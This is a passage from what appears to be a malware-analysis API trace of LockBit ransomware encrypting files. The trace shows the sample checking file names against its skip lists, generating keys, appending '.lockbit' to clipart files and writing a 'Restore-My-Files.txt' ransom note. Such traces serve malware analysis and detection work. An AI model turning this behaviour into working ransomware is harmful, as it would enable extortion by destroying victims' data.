| out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.906] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.906] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35bab100, ftCreationTime.dwHighDateTime=0x1bf3bda, ftLastAccessTime.dwLowDateTime=0x6d2e6230, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x35bab100, ftLastWriteTime.dwHighDateTime=0x1bf3bda, nFileSizeHigh=0x0, nFileSizeLow=0x4754, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00157_.WMF", cAlternateFileName="")) returned 1 [0173.906] lstrcmpiW (lpString1=".", lpString2="SO00157_.WMF") returned -1 [0173.906] lstrcmpiW (lpString1="..", lpString2="SO00157_.WMF") returned -1 [0173.906] PathFindExtensionW (pszPath="SO00157_.WMF") returned=".WMF" [0173.906] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.906] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.906] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.906] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0173.906] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.906] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.906] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.906] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.906] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.906] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.906] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.906] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0173.906] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.906] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.906] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.906] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.906] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.906] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.906] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.907] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.907] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.907] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.907] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.907] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.907] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.907] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0173.907] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.907] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.907] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.907] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.907] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.907] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.907] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.907] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.907] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.907] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.907] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.907] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0173.907] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.907] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.907] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.907] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.907] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.907] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.907] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.907] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.907] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.907] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00157_.WMF") returned -1 [0173.908] lstrcmpiW (lpString1="ntldr", lpString2="SO00157_.WMF") returned -1 [0173.908] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00157_.WMF") returned -1 [0173.908] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00157_.WMF") returned -1 [0173.908] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00157_.WMF") returned -1 [0173.908] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00157_.WMF") returned 1 [0173.908] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00157_.WMF") returned -1 [0173.908] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.908] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00157_.WMF") returned=".WMF" [0173.908] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.908] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.908] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.908] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.908] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.908] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.908] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.908] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0173.908] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.908] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.908] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.908] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0173.908] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.908] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.908] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.908] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.908] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.908] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.908] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.908] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.908] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.908] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.909] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.909] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.909] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.909] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.909] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.909] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.909] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00157_.WMF.lockbit") returned 72 [0173.909] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00157_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00157_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0173.912] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.913] malloc (_Size=0x40068) returned 0x3e70008 [0173.913] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=18260) returned 1 [0173.913] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.913] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0173.913] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.913] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0173.913] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0173.916] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00157_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00157_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.916] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.916] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.917] free (_Block=0x1fa2ed8) [0173.917] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00157_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.917] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.917] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.917] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e388d00, ftCreationTime.dwHighDateTime=0x1bd4b14, ftLastAccessTime.dwLowDateTime=0x5a9f29b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e388d00, ftLastWriteTime.dwHighDateTime=0x1bd4b14, nFileSizeHigh=0x0, nFileSizeLow=0x2026, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00159_.WMF", cAlternateFileName="")) returned 1 [0173.917] lstrcmpiW (lpString1=".", lpString2="SO00159_.WMF") returned -1 [0173.917] lstrcmpiW (lpString1="..", lpString2="SO00159_.WMF") returned -1 [0173.917] PathFindExtensionW (pszPath="SO00159_.WMF") returned=".WMF" [0173.917] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.917] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.917] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.917] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0173.917] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.917] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.917] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.918] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.918] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.918] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.918] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.918] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0173.918] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.918] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.918] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.918] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.918] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.918] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.918] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.918] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.918] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.918] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.918] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.918] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.918] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.918] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0173.918] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.918] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.918] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.918] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.918] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.918] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.918] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.918] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.918] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.918] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.919] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.919] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0173.919] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.919] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.919] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.919] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.919] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.919] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.919] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.919] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.919] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.919] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00159_.WMF") returned -1 [0173.919] lstrcmpiW (lpString1="ntldr", lpString2="SO00159_.WMF") returned -1 [0173.919] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00159_.WMF") returned -1 [0173.919] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00159_.WMF") returned -1 [0173.919] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00159_.WMF") returned -1 [0173.919] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00159_.WMF") returned 1 [0173.919] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00159_.WMF") returned -1 [0173.919] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.919] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00159_.WMF") returned=".WMF" [0173.919] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.919] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.919] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.919] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.919] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.919] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.919] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.919] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0173.919] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.920] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.920] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.920] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0173.920] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.920] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.920] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.920] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.920] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.920] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.920] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.920] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.920] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.920] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.920] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.920] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.920] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.920] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.920] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.920] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.920] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00159_.WMF.lockbit") returned 72 [0173.920] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00159_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00159_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0173.924] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.924] malloc (_Size=0x40068) returned 0x3d70450 [0173.924] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=8230) returned 1 [0173.924] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.925] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0173.925] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.925] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0173.925] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0173.927] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00159_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00159_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.927] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.927] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.928] free (_Block=0x1fa2ed8) [0173.928] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00159_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.928] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.928] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.929] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3815d700, ftCreationTime.dwHighDateTime=0x1bd4aea, ftLastAccessTime.dwLowDateTime=0x5a9f29b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3815d700, ftLastWriteTime.dwHighDateTime=0x1bd4aea, nFileSizeHigh=0x0, nFileSizeLow=0x35b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00166_.WMF", cAlternateFileName="")) returned 1 [0173.929] lstrcmpiW (lpString1=".", lpString2="SO00166_.WMF") returned -1 [0173.929] lstrcmpiW (lpString1="..", lpString2="SO00166_.WMF") returned -1 [0173.929] PathFindExtensionW (pszPath="SO00166_.WMF") returned=".WMF" [0173.929] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.929] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.929] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.929] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0173.929] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.929] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.929] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.929] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.929] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.929] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.929] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.929] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0173.929] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.929] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.929] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.929] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.929] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.929] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.929] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.929] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.929] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.929] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.929] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.929] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.930] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.930] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0173.930] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.930] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.930] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.930] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.930] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.930] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.930] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.930] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.930] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.930] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.930] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.930] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0173.930] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.930] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.930] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.930] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.930] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.930] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.930] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.930] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.930] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.930] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00166_.WMF") returned -1 [0173.930] lstrcmpiW (lpString1="ntldr", lpString2="SO00166_.WMF") returned -1 [0173.930] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00166_.WMF") returned -1 [0173.930] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00166_.WMF") returned -1 [0173.930] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00166_.WMF") returned -1 [0173.931] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00166_.WMF") returned 1 [0173.931] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00166_.WMF") returned -1 [0173.931] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.931] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00166_.WMF") returned=".WMF" [0173.931] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.931] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.931] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.931] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.931] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.931] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.931] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.931] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0173.931] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.931] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.931] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.931] lstrcmpiW (lpString1=".dbs", 